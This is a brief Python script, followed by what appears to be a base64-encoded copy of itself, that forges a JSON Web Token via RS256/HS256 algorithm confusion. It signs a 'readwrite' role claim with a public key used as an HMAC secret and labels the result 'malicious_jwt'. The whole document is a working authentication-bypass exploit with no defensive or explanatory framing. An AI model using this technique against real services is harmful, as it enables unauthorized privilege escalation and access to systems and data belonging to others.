import jwt
# Placeholder public key (replace with actual key if available)
public_key = "place_holder_public_key"
# JWT payload with desired role
payload = {
"login": "testtest321",
"role": "readwrite"
}
# Create JWT with RS256 algorithm in header but sign with HS256 using the public key
malicious_jwt = jwt.encode(payload, public_key, algorithm="HS256", headers={"alg": "RS256"})
print(malicious_jwt)
aW1wb3J0IGp3dAoKIyBQbGFjZWhvbGRlciBwdWJsaWMga2V5IChyZXBsYWNlIHdpdGggYWN0dWFsIGtleSBpZiBhdmFpbGFibGUpCnB1YmxpY19rZXkgPSAicGxhY2VfaG9sZGVyX3B1YmxpY19rZXkiCgojIEpXVCBwYXlsb2FkIHdpdGggZGVzaXJlZCByb2xlCnBheWxvYWQgPSB7CgkibG9naW4iOiAidGVzdHRlc3QzMjEiLAogICAgInJvbGUiOiAicmVhZHdyaXRlIgp9CgojIENyZWF0ZSBKV1Qgd2l0aCBSUzI1NiBhbGdvcml0aG0gaW4gaGVhZGVyIGJ1dCBzaWduIHdpdGggSFMyNTYgdXNpbmcgdGhlIHB1YmxpYyBrZXkKbWFsaWNpb3VzX2p3dCA9IGp3dC5lbmNvZGUocGF5bG9hZCwgcHVibGljX2tleSwgYWxnb3JpdGhtPSJIUzI1NiIsIGhlYWRlcnM9eyJhbGciOiAiUlMyNTYifSkKCnByaW50KG1hbGljaW91c19qd3Qp